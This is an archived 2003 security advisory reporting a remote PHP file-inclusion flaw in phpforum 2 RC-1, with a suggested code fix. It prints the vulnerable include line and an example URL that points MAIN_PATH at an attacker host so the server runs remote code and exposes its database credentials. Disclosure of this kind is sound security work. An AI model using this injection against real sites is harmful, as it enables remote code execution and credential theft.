TUCoPS :: Web BBS :: etc :: bt600.txt

PHP-Include-Hack-Possibility in phpforum 2 RC-1 


 ================================================
<------------------------------------------------>
<------------#www.bright-shadows.net#------------>
<------------------------------------------------>
<--------------#theblacksheep&erik#-------------->
<------------------------------------------------>
 ================================================

Advisory Information
--------------------
Advisory Name      : PHP-Include-Hack-Possibility in phpforum 2 RC-1
Author             : Marc Bromm <theblacksheep@fastmail.fm> Germany
Discover by        : Marc Bromm <theblacksheep@fastmail.fm> Germany
Release Date       : 10. Juli 2003
Application        : phpforum 2 RC-1
Vendor Homepage    : http://www.phpmyforum.de/
Vendor Status      : notified
Vulnerable Versions: phpforum 2 RC-1 (maybe older)
Platforms          : OS Independent, PHP
Severity           : High

######Overview:

The phpforum is a mySQL based forum with a lot of functions.

######Exploit:

1. Exploitable file

The exploitable file is the "mainfile.php". The first 2 lines are:

----------------------------------------
<?php
include("$MAIN_PATH/config.php");    //Konfiguration
----------------------------------------

So it is possible to set $MAIN_PATH to everything.
For example:

-> www.victim.com/forum/mainfile.php?MAIN_PATH=http://www.attack.com

Then you need only a "config.php" file with the code you like to execute.
So you can get for example the SQL server password and the username which
are stored in the "config.inc.php" file.
But it is necessary that the attacking webserver (evilhost) can't be
running PHP
or the code will be run on the attacking machine rather than the target
machine.

######Solution:

Change
-----------------------------------
include("$MAIN_PATH/config.php");    //Konfiguration
-----------------------------------
to
-----------------------------------
include("config.php");    //Konfiguration
-----------------------------------
cause the config file is in the same folder as the mainfile.

Greetz to:

Erik, (O_o)oOoOoOo.
-- 
  
  theblacksheep@fastmail.fm

-- 
http://www.fastmail.fm - mmm... Fastmail...

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH